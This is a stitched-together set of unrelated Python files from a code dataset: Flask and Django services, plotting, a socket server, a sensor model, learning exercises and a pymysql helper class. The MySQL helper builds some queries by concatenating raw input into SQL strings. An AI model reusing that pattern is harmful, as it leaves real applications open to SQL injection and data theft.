email=row.get(\"email\"),\r\n                role=row.get(\"role\"),\r\n                phone=row.get(\"phone\")\r\n                # **row\r\n            )\r\n        )\r\n    db.session.commit()\r\n\r\n\r\ndef insert_data_orders(input_data):\r\n    # populate the Order table\r\n    for row in input_data:\r\n        db.session.add(\r\n            Order(\r\n                id=row.get(\"id\"),\r\n                name=row.get(\"name\"),\r\n                description=row.get(\"description\"),\r\n                start_date=row.get(\"start_date\"),\r\n                end_date=row.get(\"end_date\"),\r\n                address=row.get(\"address\"),\r\n                price=row.get(\"price\"),\r\n                customer_id=row.get(\"customer_id\"),\r\n                
executor_id=row.get(\"executor_id\")\r\n                # **row\r\n            )\r\n        )\r\n    db.session.commit()\r\n\r\n\r\ndef insert_data_offers(input_data):\r\n    # populate the Offer table\r\n    for row in input_data:\r\n        db.session.add(\r\n            Offer(\r\n                id=row.get(\"id\"),\r\n                order_id=row.get(\"order_id\"),\r\n                executor_id=row.get(\"executor_id\")\r\n                # **row\r\n            )\r\n        )\r\n    db.session.commit()\r\n\r\n\r\ndef get_all(model):\r\n    # fetch all rows of the selected model\r\n    result = []\r\n    for row in db.session.query(model).all():\r\n        result.append(row.to_dict())\r\n    return result\r\n\r\n\r\ndef get_all_by_id(model, user_id):\r\n    # fetch a row of the selected model by user_id\r\n    try:\r\n        return db.session.query(model).get(user_id).to_dict()\r\n    except Exception:\r\n        return {}\r\n\r\n\r\ndef update_universal(model, user_id, values):\r\n    # update a record in the database\r\n    try:\r\n        db.session.query(model).filter(model.id == user_id).update(values)\r\n        db.session.commit()\r\n    except Exception as e:\r\n        print(e)\r\n        return {}\r\n\r\n\r\ndef delete_universal(model, user_id):\r\n    # delete a record from the database\r\n    try:\r\n        db.session.query(model).filter(model.id == user_id).delete()\r\n        db.session.commit()\r\n    except Exception as e:\r\n        print(e)\r\n        return {}\r\n\r\n\r\ndef init_db():\r\n    # on startup: wipe existing data, create the models, and seed them with data\r\n    db.drop_all()\r\n    db.create_all()\r\n\r\n    with open(\"data/users.json\", encoding=\"utf-8\") as file:\r\n        data = json.load(file)\r\n        insert_data_users(data)\r\n\r\n    with open(\"data/offers.json\", encoding=\"utf-8\") as file:\r\n        data = json.load(file)\r\n        insert_data_offers(data)\r\n\r\n    with open(\"data/orders.json\", encoding=\"utf-8\") as file:\r\n        data = json.load(file)\r\n        insert_data_orders(data)\r\n","repo_name":"Nik16221/HW16","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"33800354759","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport math\nf = open('smooth.json',)\nData = json.load(f)\n\n\nclor = ['blue' , 'green' , 'red']\nplt.title(\"Before Smooth\")\nplt.xlabel(\"x axis\")\nplt.ylabel(\"z axis\")\n\nx = []\ny = []\n\nfor curData in Data:\n    x.append(curData[0])\n    y.append(-curData[2])\n\nplt.scatter(x,y,s=50)\nplt.show()","repo_name":"chulanpro5/Sign-language-translator-device","sub_path":"Draw/DrawSmooth.py","file_name":"DrawSmooth.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"}
+{"seq_id":"77659186","text":"# -*- coding: utf-8 -*- \n\nfrom common.datastructures import Enumeration\nfrom notifications import strings\n\nNOTIFICATION_TYPE_CHOICES = Enumeration([\n    (1, 'CIRCUIT_CREATED', strings.CIRCUIT_CREATED),\n    (2, 'CIRCUIT_FAVORITED', strings.CIRCUIT_FAVORITED),\n    (3, 'CIRCUIT_REMIXED', strings.CIRCUIT_REMIXED),\n    (4, 'CIRCUIT_UPDATED', strings.CIRCUIT_UPDATED),\n    (5, 'USER_FOLLOWED', strings.USER_FOLLOWED),\n    (6, 'CONTENT_SHARED', strings.CONTENT_SHARED)\n])\n\n\n# API\nAPI_DEFAULT_NOTIFICATIONS_LIMIT = 10\nAPI_DEFAULT_NOTIFICATIONS_OFFSET = 0\n","repo_name":"mathiasbc/WR","sub_path":"apps/notifications/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"29477809743","text":"#!/usr/bin/env python3\nimport sys\nimport yaml\nimport xml.etree.ElementTree 
as ElementTree\n\nfrom py_tdf.validate import validate\n\n# NTRT yaml expects node ids to be alphanumeric\n# plain numbers are not allowed\nID_PREFIX = 'a_'\n\n\n\ndef tdf2ntrt_yaml(tdf_path):\n tree = ElementTree.parse(tdf_path)\n root = tree.getroot()\n\n validate(tree)\n\n # just map it to JSON-like structure, no additional checks\n # assuming that tdf is correct\n result = {'nodes': {}, 'pair_groups': {}, 'builders': {}}\n positions = root.findall('initial_positions')[0].findall('node')\n\n for pos in positions:\n id = f\"{ID_PREFIX}{pos.attrib['id']}\"\n [x, y, z] = list(map(float, pos.attrib['xyz'].split()))\n result['nodes'][id] = [x+10, y+10, z+10]\n\n rods = root.findall('composition')[0].findall('rod')\n for el in rods:\n id1 = f\"{ID_PREFIX}{el.attrib['node1']}\"\n id2 = f\"{ID_PREFIX}{el.attrib['node2']}\"\n class_name = f\"{ID_PREFIX}{el.attrib['class']}\"\n result['pair_groups'][class_name] = result['pair_groups'].get(class_name, [])\n result['pair_groups'][class_name].append([id1, id2])\n\n cables = root.findall('composition')[0].findall('cable')\n for el in cables:\n id1 = f\"{ID_PREFIX}{el.attrib['node1']}\"\n id2 = f\"{ID_PREFIX}{el.attrib['node2']}\"\n class_name = f\"{ID_PREFIX}{el.attrib['class']}\"\n result['pair_groups'][class_name] = result['pair_groups'].get(class_name, [])\n result['pair_groups'][class_name].append([id1, id2])\n\n for el in root.findall('rod_class'):\n id = f\"{ID_PREFIX}{el.attrib['id']}\"\n result['builders'][id] = {\n 'class': 'tgRodInfo',\n 'parameters': {\n # 'stiffness': float(el.attrib['stiffness']),\n # as far as I understand, you do not specify rest_length\n # for rod in NTRT. Didn't find such config parameter.\n # I assume it is computed from node positions\n 'density': 0.688,\n 'radius': 0.05,\n }\n }\n for el in root.findall('cable_class'):\n id = f\"{ID_PREFIX}{el.attrib['id']}\"\n result['builders'][id] = {\n 'class': 'tgBasicActuatorInfo',\n 'parameters': {\n 'stiffness': float(el.attrib['stiffness']),\n # 'damping': 10,\n # 'pretension': 1000,\n # 'minRestLength': float(el.attrib['stiffness']),\n }\n }\n\n return result\n\nif __name__ == '__main__':\n # ran as a script, we need to split out YAML data for given tdf file\n [tdf_path, *rest] = sys.argv[1:]\n # print('path: ', tdf_path)\n values = tdf2ntrt_yaml(tdf_path)\n print(yaml.dump(values, default_flow_style=False))\n","repo_name":"vladimir-vg/tensegrity-document-format","sub_path":"py_tdf/tdf2ntrt_yaml.py","file_name":"tdf2ntrt_yaml.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34197285692","text":"import logging\nimport os\n\nimport requests\n\nfrom app.model.credential_schema_tables_model.instructor_role_model import InstructorRoleModel\nfrom app.persistence.credential_schema_tables_persistence.instructor_role_persistence import InstructorRolePersistence\nfrom app.services.issue_params import set_params\nfrom app.util.error_handlers import RecordNotFound\n\n\nclass InstructorRoleService:\n @classmethod\n def add(cls, user_id, user_name, name, description, type, external_id):\n\n instructor_role = InstructorRoleModel(name=name, description=description, type=type, external_id=external_id)\n instructor_role = InstructorRolePersistence.add(user_id, user_name, instructor_role)\n return instructor_role\n\n @classmethod\n def update(cls, user_id, user_name, uuid, args):\n instructor_role = InstructorRolePersistence.get(uuid)\n\n if instructor_role is None:\n raise 
RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n\n instructor_role = InstructorRoleModel(\n uuid=uuid,\n name=args.get(\"name\", instructor_role.name),\n description=args.get(\"description\", instructor_role.description),\n type=args.get(\"type\", instructor_role.type),\n external_id=args.get(\"external_id\", instructor_role.external_id)\n )\n instructor_role = InstructorRolePersistence.update(user_id, user_name, instructor_role)\n\n return instructor_role\n\n @classmethod\n def delete(cls, user_id, user_name, uuid):\n instructor_role = InstructorRolePersistence.get(uuid)\n if instructor_role is None:\n raise RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n InstructorRolePersistence.delete(user_id, user_name, instructor_role)\n return instructor_role\n\n @classmethod\n def get(cls, uuid):\n instructor_role = InstructorRolePersistence.get(uuid)\n if instructor_role is None:\n raise RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n return instructor_role\n\n @classmethod\n def get_all(cls):\n return InstructorRolePersistence.get_all()\n\n @classmethod\n def get_all_by_filter(cls, filter_dict):\n return InstructorRolePersistence.get_all_by_filter(filter_dict)\n\n @classmethod\n def issue(cls, external_id: str):\n records = InstructorRolePersistence.get_by_external_user_id(external_id)\n pocket_core_api_credential = os.getenv(\"DATA_BROKER_URL\") + \"/credential/issue\"\n\n logging.debug(f\"Issuing badge credentials for: {external_id} total: {len(records)}\")\n\n for record in records:\n params = set_params(external_id, \"instructor_role\", record._to_dict())\n requests.post(pocket_core_api_credential, json=params)\n","repo_name":"sSeyfoddini/somayeh","sub_path":"app/services/credential_schema_tables_services/instructor_role_service.py","file_name":"instructor_role_service.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28018621933","text":"import traceback\nfrom dataclasses import dataclass\nfrom typing import List, Any\n\nfrom pymysql import connections as mysql_connection\nimport pymysql\nfrom myLogger.Logger import getLogger as GetLogger\n\nlog = GetLogger(__name__)\n\n\n@dataclass\nclass Mysql:\n host: str\n port: int\n user: str\n password: str\n database: str\n connection: mysql_connection\n cursor: Any\n sql: str\n\n\nclass MySQLDatabase(Mysql):\n def __init__(self, host, port, user, password, database, **kwargs):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.database = database\n self.connection = self.connect(host, port, user, password, database, **kwargs)\n self.cursor = self.connection.cursor()\n\n def connect(self, host, port, user, password, database, **kwargs) -> mysql_connection:\n try:\n\n charset = kwargs.get('charset', 'utf8mb4')\n host = host if host else self.host\n port = port if port else self.port\n user = user if user else self.user\n password = password if password else self.password\n database = database if database else self.database\n connection = pymysql.connect(host=host,\n port=port,\n user=user,\n password=password,\n db=database,\n charset=charset,\n )\n return connection\n except Exception as e:\n log.error(f'Error while connecting to Milvus and MySQL: {e}')\n log.error(traceback.format_exc())\n raise e\n\n def execute_batch_query(self, queries):\n try:\n with self.connection.cursor() as cursor:\n for query in queries:\n 
cursor.execute(query)\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing batch query: \\n{queries} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n\n def execute_query(self, query, args=None):\n try:\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n\n def query(self, query, args=None):\n try:\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n result = cursor.fetchall()\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n return result\n\n def insert(self, query: str, args=None):\n try:\n # validate query\n if \"insert\" not in query.split(\" \"):\n raise ValueError(\"Query must be an insert query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing insert query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def update(self, query, args):\n \"\"\"\n Updates data in MySQL\n\n :param query: query to be executed\n :param args: arguments to be passed to the query\n :return: None\n \"\"\"\n try:\n # validate query\n if \"update\" not in query.split(\" \"):\n raise ValueError(\"Query must be an update query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing update query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def delete(self, query, args):\n \"\"\"\n Deletes data from MySQL\n\n :param query: query to be executed\n :param args: arguments to be passed to the query\n :return: None\n \"\"\"\n try:\n # validate query\n if \"delete\" not in query.split(\" \"):\n raise ValueError(\"Query must be a delete query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing delete query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def load_data_to_mysql(self, table_name, data) -> None:\n \"\"\"\n Loads data into MySQL\n\n :param table_name: name of the table\n :param data: data to be loaded\n :return: None\n \"\"\"\n sql = \"insert into \" + table_name + \" (id, question, answer) values (%s, %s, %s);\"\n # check if the data to be inserted is already present\n check_sql = f\"SELECT COUNT(*) FROM {table_name} WHERE id = %s\"\n try:\n cnt = 0\n for row in data:\n with self.connection.cursor() as cursor:\n cursor.execute(check_sql, (row[0],))\n result = cursor.fetchone()[0]\n if result == 0:\n cursor.execute(sql, row)\n self.connection.commit()\n cnt += 1\n if cnt == 0:\n log.info(\"MYSQL loads data to table: {} successfully\".format(table_name))\n log.info(\"MYSQL loads data to table: {} successfully. Number of Records: {}\".format(table_name, cnt))\n except Exception as e:\n log.error(f'Error while loading data to MySQL. 
Sql insert error: \\n{sql}\\n{e} ')\n log.error(traceback.format_exc())\n raise e\n\n def get_similar_questions(self, ids, table_name) -> List:\n \"\"\"\n Gets the similar questions from MySQL\n\n :param ids: ids of the similar questions\n :param table_name: name of the table\n :return: list of similar questions\n \"\"\"\n str_ids = str(ids).replace('[', '').replace(']', '')\n sql = \"select question from \" + table_name + \" where id in (\" + str_ids + \") order by field (id,\" + str_ids + \");\"\n try:\n if ids is None or len(ids) == 0:\n return []\n with self.connection.cursor() as cursor:\n cursor.execute(sql)\n results = cursor.fetchall()\n results = [res[0] for res in results]\n return results\n except Exception as e:\n log.error(f'Error while getting similar questions: \\nSql: \\n{sql} \\n{e} ')\n log.error(traceback.format_exc())\n raise e\n\n def search_by_similar_questions(self, table_name, question=None) -> List:\n \"\"\"\n Searches for the answer by similar questions\n\n :param question: question\n :param table_name: name of the table\n :return: answer list\n \"\"\"\n sql = \"select answer from \" + table_name + \" where question = `None`;\"\n try:\n if question is None or len(question) == 0:\n raise Exception(\"Question is None or empty\")\n sql = \"select answer from \" + table_name + \" where question in ('\" + question[0] + \"');\"\n with self.connection.cursor() as cursor:\n cursor.execute(sql)\n rows = cursor.fetchall()\n if rows is None or len(rows) == 0:\n raise Exception(\"No answer found\")\n return rows\n except Exception as e:\n log.error(f'Error while searching by similar questions: \\nSql: \\n{sql} \\n{e} ')\n log.error(traceback.format_exc())\n return []\n\n","repo_name":"dellius-alexander/Vector-DB-SearchBot","sub_path":"src/database/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"305085231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA file containing all the imitation sensors used in applying the ukf\nto stationsim\n\"\"\"\n\nimport numpy as np\nimport shapely.geometry as geom\n\ndef generate_Camera_Rect(bl, tl, tr, br, boundary = None):\n \"\"\" Generate a square polygon \n \n Parameters\n ------\n br, br, tl, tr : `array_like`\n bottom left `bl`, bottom right `br`, top left `tl`, and top right `tr`.\n Basically, where are the corners of the rectangle.\n \n boundary : `Polygon`\n indicate if this rectangle is a boundary. If no arguement is given,\n the polygon generated does is not an intersect with some boundary.\n This arguement is None when we generate a boundary and is usually\n stationsims dimensions if we wish to cut off some square cameras\n accordingly.\n Returns\n ------\n poly : `Polygon`\n square polygon with defined corners.\n \"\"\"\n \n #build array of coordinates for shapely to read\n points = np.array([bl, tl, tr, br])\n #build polygon\n poly = geom.Polygon(points)\n #take the intersect with some bounadary else return it as is\n if boundary is not None:\n poly = poly.intersection(boundary) #cut off out of bounds areas\n \n return poly\n\ndef generate_Camera_Cone(pole, centre, arc, boundary):\n \"\"\"construct Polygon object containing cone\n\n I'd recommend knowing how polar coordinates work before reading this \n code. Particualy converting cartesian to polar and back.\n Parameters\n ------\n \n pole : array_like\n `pole` central point where the camera is. 
\n The vision arc segment originates about this point.\n \n centre : array_like\n `centre` indicates from the pole where the camera is facing.\n The distance of this point away from the pole also determines\n the radius of the cameras vision arc. Further away implies a \n larger more radius and a long field of vision.\n \n arc: float\n We choose a number 0 < x <= 1 that determines how wide the vision \n segment is. For example, if we choose arc = 0.25, the camera would form\n be a quarter circle of vision.\n \n boundary : Polygon\n `boundary` of ABM topography. E.g. rectangular corridor for \n stationsim. Indicates where to cut off polygons if they're out of\n bounds.\n\n Returns\n -------\n poly : Polygon\n `poly` polygon arc segment of the cameras vision.\n \"\"\"\n # convert arc from a proportion of a circle to radians\n angle = arc * np.pi*2 \n # difference between centre and pole.\n # determines which the radius and direction the camera points.\n diff = centre-pole \n # arc radius\n r = np.linalg.norm(diff) \n # angle the camera points in radians anticlockswise about east.\n centre_angle = np.arctan2(diff[1],diff[0]) \n \n # generate points for arc polygon\n # precision is how many points. more points means higher resolution\n # set to 100 can easily be less or more\n precision = angle/100\n \n #start to build coordinates\n #start by finding out the angle of each polygon point about east\n\n angle_range = np.arange(centre_angle - angle/2,\n centre_angle + angle/2 , precision)\n #convert these angles into x,y coordinates using the radius of the\n #camera r and the standard formula for polar to cartesian conversion\n x_range = pole[0] + r * np.cos(angle_range)\n y_range = pole[1] + r * np.sin(angle_range)\n \n if arc < 1:\n # if camera isnt a complete circle add central point to polygon\n # this essentially closes the loop making it a proper circle segment.\n x_range = np.append(x_range, pole[0])\n y_range = np.append(y_range, pole[1])\n \n #stack x and y coorindates and build polygon\n poly = geom.Polygon(np.column_stack([x_range,y_range]))\n #intersect with boundary to remove out of bounds elements.\n poly = poly.intersection(boundary) #cut off out of bounds areas\n \n return poly\n\nclass camera_Sensor():\n \"\"\"class for an imitation camera.\"\"\"\n \n def __init__(self, polygon):\n \"\"\"init the camera using a single polygon\n !!maybe extend this to a list of polygons\n\n Parameters\n ----------\n polygons : `Polygon`\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.polygon = polygon\n \n def observe(self, state):\n \"\"\" determine what this camera observes of a model state at a given time\n \n if an item if in the arc segment polygon take its observations \n !!with noise?\n \n Parameters\n ------\n agents: list\n list of `agent` classes \n \n Returns\n ------\n which_in : list\n a list of the same shape a state indicating 1 if an agent is within a \n cameras vision and 0 otherwise.\n \"\"\"\n which_in = []\n \n state = np.reshape(state, (int(len(state)/2),2))\n \n \n for i in range(state.shape[0]):\n point = geom.Point(state[i,:]) \n \n is_in = point.within(self.polygon)\n if is_in:\n which_in += [i]\n \n return which_in\n \n \n\"WIP. 
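Known issue: count() indexes old_agents, but __init__ sets self.agents to 0, so the first call would raise. 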
Not yet working.\"\nclass footfall_Sensor():\n \"\"\"\n count how many people pass through a specified polygon.\n \"\"\"\n \n \n def __init__(self, polygon, positions):\n \"\"\"\n \n Parameters\n ------\n polygon : Polygon\n \"\"\"\n \n self.polygon = polygon\n self.agents = 0\n self.footfall_counts = []\n \n def count(self, agents):\n \n \"\"\" check if an agent posses through the footfall counter polygon\n \n draw lines between each new and old positions\n if lines intersect a polygon add one to count\n \"\"\"\n footfall_count = 0\n # create list of Lines indicating where agents travelled\n old_agents = self.agents\n\n for i, item in enumerate(agents):\n line = np.array([[item.location, old_agents[i].location]])\n line = geom.LineString(line) \n if line.intersects(self.polygon):\n footfall_count+=1\n self.footfall_counts.append(footfall_count)\n self.agents = agents\n ","repo_name":"Urban-Analytics/dust","sub_path":"Projects/ABM_DA/experiments/ukf_experiments/modules/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"63"} +{"seq_id":"14765809695","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: xiaotian\n\nfrom PIL import Image\n\n# table1 = \"\"\"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\"^`''. \"\"\"#这种方法好像不太好\ntable = '#8XOHLTI)i=+;:,. ' # 对于灰度图像效果不错\nim = Image.open(\"./1.jpg\")\nif im.mode != \"L\": # 如果不是灰度图像,转换为灰度图像\n im = im.convert(\"L\")\na = im.size[0]\nb = im.size[1]\nim = im.resize((200, 266)) # 转换图像大小,这个大小是我随意设置的\nf = open(\"./image.txt\", 'w+') # 目标文本文件\n\nfor i in range(1, b, 2): # 每隔一行取一行像素,是为了保持视觉上的横纵比\n line = ''\n for j in range(a):\n line += table[int((float(im.getpixel((j, i))) / 256.0) * len(table))] # 计算当前像素属于哪个字符\n line += \"\\n\" # 别忘了添加回车符\n f.write(line)\nf.close()","repo_name":"xiaotian666/spider","sub_path":"src/imageToStr.py","file_name":"imageToStr.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"8175514135","text":"from torch.optim.lr_scheduler import _LRScheduler\nfrom bisect import bisect_right\n\n# Based on https://github.com/pytorch/pytorch/blob/master/torch/optim/lr_scheduler.py\n\nclass LinearMultiStepWarmUp(_LRScheduler):\n def __init__(self, cfg, optimizer, last_epoch=-1):\n self.gamma = cfg.SOLVER.GAMMA\n self.milestones = cfg.SOLVER.MULTISTEP_MILESTONES\n self.warmup_period = cfg.SOLVER.WARMUP_PERIOD\n\n super().__init__(optimizer, last_epoch)\n \n def get_lr(self):\n if self.warmup_period > 0.0:\n warmup_factor = min(1.0, (self._step_count+1)/self.warmup_period)\n else:\n warmup_factor = 1.0\n\n return [base_lr * warmup_factor * self.gamma ** bisect_right(self.milestones, self.last_epoch)\n for base_lr in self.base_lrs]\n","repo_name":"andersfagerli/NTNU","sub_path":"TDT4265 - Computer Vision and Deep Learning/Project/SSD/ssd/engine/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"70349663560","text":"# RabuRetta Server\n\nimport socket\nimport time\nimport selectors\nimport types\nfrom enum import Enum\nfrom rrcommon import *\n\nclass RabuRettaServerSettings():\n\n def __init__(self):\n self.address = None\n self.timesleep = 60\n self.timetry = 5\n self.buffer_size = None\n self.f_table = {}\n self.new_conn = None\n self.on_error = 
None\n\nclass RabuRettaUserPrivilege(Enum):\n Admin = 1\n Ordinary = 2\n Unassigned = 3\n\nclass RabuRettaUser():\n\n def __init__(self, addr):\n self.addr = addr\n self.data_processor = RabuRettaDataProcessor()\n self.outgoing = b\"\"\n\n self.priv = RabuRettaUserPrivilege.Unassigned\n self.name = None\n self.age = None\n\n def __hash__(self):\n\n return self.addr\n\nclass RabuRettaServer():\n\n def __init__(self, rrss):\n self.sel = selectors.DefaultSelector()\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.users = {}\n self.buffer_size = rrss.buffer_size\n\n self.f_table = rrss.f_table\n self.new_conn = rrss.new_conn\n self.on_error = rrss.on_error\n\n attempt = rrss.timetry\n sock_addr = rrss.address\n\n while True:\n\n try:\n self.sock.bind(sock_addr)\n if (sock_addr[1] == 0):\n sock_addr = (sock_addr[0], self.get_port())\n\n except OSError:\n\n if attempt == 0:\n raise Exception(\n \"Could not bind socket to %s:%d.\" %\n sock_addr\n )\n\n print(\"Socket busy, retrying in 60s...\")\n time.sleep(rrss.timesleep)\n\n attempt -= 1\n\n continue\n\n else:\n print(\"Socket bound to %s:%d.\" % sock_addr)\n\n break\n\n self.sock.listen()\n\n print(\"Waiting for connections...\")\n\n self.sock.setblocking(False)\n self.sel.register(self.sock, selectors.EVENT_READ, data=None)\n\n while True:\n events = self.sel.select(timeout=None)\n\n for key, mask in events:\n\n if key.data is None:\n addr = self.accept_conn()\n else:\n self.process_data(key, mask, addr)\n\n def has_admin(self):\n\n return False if len(\n [ u for u in self.users.values()\n if u.priv == RabuRettaUserPrivilege.Admin\n ]) == 0 else True\n\n def get_port(self):\n\n return self.sock.getsockname()[1]\n\n def send_request(self, addr, request, message, data):\n self.users[addr].outgoing += RabuRettaCommon.package(\n RabuRettaServerRequest.create(\n request,\n message,\n data\n )\n )\n\n def accept_conn(self):\n conn, addr = self.sock.accept()\n conn.setblocking(False)\n\n print(\n \"Accepted connection from: %s\" %\n str(addr)\n )\n\n self.users[addr] = RabuRettaUser(addr)\n\n self.sel.register(\n conn,\n selectors.EVENT_READ | selectors.EVENT_WRITE,\n types.SimpleNamespace(\n inb=b'',\n outb=b''\n )\n )\n\n if self.new_conn is not None:\n self.new_conn(self, addr)\n\n return addr\n\n def process_request(self, addr, message):\n\n if message.comm in self.f_table:\n try:\n if self.f_table[message.comm](\n self,\n addr,\n *(el for el in message.data.split())\n ) == False:\n quit()\n\n except TypeError as e:\n self.server_error(\n addr,\n str(e)\n )\n\n else:\n self.server_error(\n addr,\n \"Invalid command '%s'\" % message.comm\n )\n\n def server_error(self, addr, error_message):\n\n if self.on_error:\n if self.on_error(addr, error_message) == False:\n quit()\n\n else:\n self.send_request(\n addr,\n \"error\",\n error_message,\n \"retry\"\n )\n\n def del_user(self, addr):\n\n if addr not in self.users:\n\n return\n\n del self.users[addr]\n\n def process_data(self, key, mask, addr):\n sock = key.fileobj\n\n if mask & selectors.EVENT_READ:\n data = sock.recv(self.buffer_size)\n\n if data and addr in self.users:\n self.users[addr].data_processor.add_data(\n data,\n lambda msg: self.process_request(addr, msg),\n RabuRettaComm\n )\n else:\n print(\n \"Closing connection to %s...\" %\n str(addr)\n )\n self.sel.unregister(sock)\n sock.close()\n\n if addr in self.users:\n del self.users[addr]\n\n elif mask & selectors.EVENT_WRITE:\n\n if addr in self.users and self.users[addr].outgoing:\n key.data.outb += 
self.users[addr].outgoing\n self.users[addr].outgoing = b\"\"\n\n if key.data.outb:\n sent_bytes = key.fileobj.send(key.data.outb)\n key.data.outb = key.data.outb[sent_bytes:]\n\n def __del__(self):\n print(\"Closing socket...\")\n self.sock.close()\n\n","repo_name":"StjepanPoljak/RabuRetta","sub_path":"rrserver.py","file_name":"rrserver.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40892951328","text":"import pygame\n\n\n# bmi计算器\nheight = float(input(\"输入身高(m):\"))\nweight = float(input(\"输入体重(kg):\"))\n\nbmi = weight / pow(height, 2)\nprint(\"BMI值为:{}\".format(bmi))\n\n# 从上到下依次匹配 满足多条件下执行第一条,后面被忽略\nif bmi <= 18.4:\n print(\"偏瘦\")\nelif bmi > 18.4 and bmi <= 23.9:\n print(\"正常\")\nelif bmi > 23.9 and bmi <= 27.9:\n print(\"过重\")\nelse:\n print(\"肥胖\")\n","repo_name":"wankcn/HouTu","sub_path":"Learn-Python/branch/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"ja","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"22794725393","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2022-10-23 14:33\n@Author : allen\n@File : learn_list.py\n\n'''\n\n'''\n 先有商品列表如下\n 1. product = [[\"iphone\",6888],[\"MacPro\",14800],[\"小米6\",2499],[\"Coffee\",31],[\"Book\",60],[\"Nike\",699]]\n 需要打印出以下格式:\n --- 商品列表 ---\n 0 iphone 6888\n 1 MacPro 14800\n 2 小米6 2499\n 3 Coffee 31\n 4 Book 60\n 5 Nike 699\n \n 2. 根据上面的products列表写一个循环,不断询问用户想买什么,用户选择一个商品编号,就把对应的商品添加到购物车里,最终用户输入q退出时,打印购买的商品列表\n'''\nproduct = [[\"iphone\",6888],[\"MacPro\",14800],[\"小米6\",2499],[\"Coffee\",31],[\"Book\",60],[\"Nike\",699]]\n\n# 题1\nprint(\"--- 商品列表 ---\")\nfor i in range(len(product)):\n detail = product[i]\n print(f\"{i} {detail[0]} {detail[1]}\")\n\n# 题2\n# 用java中map的思想,1,2,3,4,5对应5个元组,匹配到就加入购物车咯,没匹配到给提示语即可\n# 购物车用一个list存储即可\n\nprint(\"--- 商品列表 ---\")\npro_map = {}\nfor i in range(len(product)):\n detail = product[i]\n pro_map[str(i)] = detail\nprint(f\"商品信息,{pro_map}\")\nprint(f\"商品信息,{pro_map.keys()}\")\n\nreturn_list = []\nstr = \"start\"\nwhile str != \"q\":\n str = input(\"请商品编号,输入q结束:\\n\")\n if str not in pro_map.keys():\n print(\"编号查无商品,请重新输入:\")\n else:\n return_list.append(pro_map.get(str))\nprint(f\"最终购物车信息为:{return_list}\")\n","repo_name":"Wuaoyang/python_learn","sub_path":"python_learn/LearnList.py","file_name":"LearnList.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"10286499858","text":"from django.shortcuts import render\r\nfrom .models import Category,Customer,Product\r\nfrom .serializers import CategorySerializer,CustomerSerializer,ProductSerializer\r\nfrom rest_framework import generics\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view,permission_classes\r\nfrom rest_framework import status\r\nfrom rest_framework.permissions import AllowAny\r\nfrom datetime import datetime,timedelta\r\n\r\n\r\n# Create your views here.\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((AllowAny,))\r\ndef ListCustomer(request):\r\n if request.method == 'GET':\r\n 